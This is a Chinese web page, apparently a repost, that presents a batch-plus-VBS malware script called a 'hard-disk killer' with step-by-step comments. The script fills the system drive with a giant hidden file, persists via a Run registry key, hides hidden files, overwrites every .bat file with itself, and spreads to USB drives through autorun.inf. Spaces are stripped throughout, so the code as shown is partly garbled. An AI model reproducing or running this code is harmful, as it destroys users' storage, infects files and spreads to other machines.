超级硬盘杀手的bat
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
复制代码 代码如下: @echooff %ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone% %ozone%%Name:REON%%ozone% %ozone%%Author:Ozone[verybat.cn]%%ozone% %ozone%%Data:17/04/2007%%ozone% %ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone% ifexsit%SystemDrive%\PAGEFILES.SYSgotoend copy%0%windir%\system32\logon.bat::复制自身 FOR/F"tokens=3*"%%iin(''dir/-c%SystemDrive%^|find"可用字节"'')dofsutilfilecreatenew%SystemDrive%\PAGEFILES.SYS%%i::制造超大文件,轰炸硬盘 attrib+r+s+h%SystemDrive%\PAGEFILES.SYS::隐藏文件 regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vKV2007/tREG_SZ/d%windir%\system32\logon.vbs::自动启动 regdeleteHKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL/va/f::不显示隐藏文件 for/r%SystemDrive%%%iin(*.bat)dotype%0>%%i::感染 ifexist%windir%\system32\logon.vbsgotoend +++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++ echosetfs=createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs echosetWshShell=WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs echoSetobjWMIService=GetObject("winmgmts:"_>>%windir%\system32\logon.vbs echo^&"{impersonationLevel=impersonate}!\\"^&strComputer^&"\root\cimv2")>>%windir%\system32\logon.vbs echoSetcolDisks=objWMIService.ExecQuery_>>%windir%\system32\logon.vbs echo("Select*fromWin32_LogicalDisk")>>%windir%\system32\logon.vbs ::监视u盘 echoFori=1to9000000000>>%windir%\system32\logon.vbs echoForEachobjDiskincolDisks>>%windir%\system32\logon.vbs echoSelectCaseobjDisk.DriveType>>%windir%\system32\logon.vbs echo:Case2:>>%windir%\system32\logon.vbs ::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏. echoy1=fs.FileExists(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs echoifnoty1then>>%windir%\system32\logon.vbs echosetf=fs.opentextfile(objDisk.DeviceID^&"\AUTORUN.INF",2,true)>>%windir%\system32\logon.vbs echof.write"[AutoRun]"^&vbcrlf>>%windir%\system32\logon.vbs echof.write"open=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs echof.write"shellexecute=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs echof.write"shell\Auto\command=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs echof.Close>>%windir%\system32\logon.vbs echoSetf1=fs.GetFile(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs echoIff1.Attributes=f1.AttributesAND2Then>>%windir%\system32\logon.vbs echo:f1.Attributes=f1.AttributesXOR7:>>%windir%\system32\logon.vbs echoEndIf>>%windir%\system32\logon.vbs echoendif>>%windir%\system32\logon.vbs ::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏. echoy2=fs.FileExists(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs echoifnoty2then>>%windir%\system32\logon.vbs echofs.CopyFile"c:\windows\system32\logon.bat",objDisk.DeviceID^&"\">>%windir%\system32\logon.vbs echoSetf2=fs.GetFile(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs echoIff2.Attributes=f2.AttributesAND2Then>>%windir%\system32\logon.vbs echo:f2.Attributes=f2.AttributesXOR7:>>%windir%\system32\logon.vbs echoEndIf>>%windir%\system32\logon.vbs echoendif>>%windir%\system32\logon.vbs echodirr=Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs ::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏. echoy3=fs.FileExists(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs echoifnoty3then>>%windir%\system32\logon.vbs echoWshShell.Run"logon.bat">>%windir%\system32\logon.vbs echoWScript.Sleep500>>%windir%\system32\logon.vbs echoSetf3=fs.GetFile(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs echoIff3.Attributes=f3.AttributesAND2Then>>%windir%\system32\logon.vbs echo:f3.Attributes=f3.AttributesXOR7:>>%windir%\system32\logon.vbs echoEndIf>>%windir%\system32\logon.vbs echoendif>>%windir%\system32\logon.vbs echoEndSelect>>%windir%\system32\logon.vbs echoNext>>%windir%\system32\logon.vbs ::每隔5秒扫描一次. echoWScript.Sleep5000>>%windir%\system32\logon.vbs echoNext>>%windir%\system32\logon.vbs ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ :end |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于超级硬盘杀手的bat的所有评论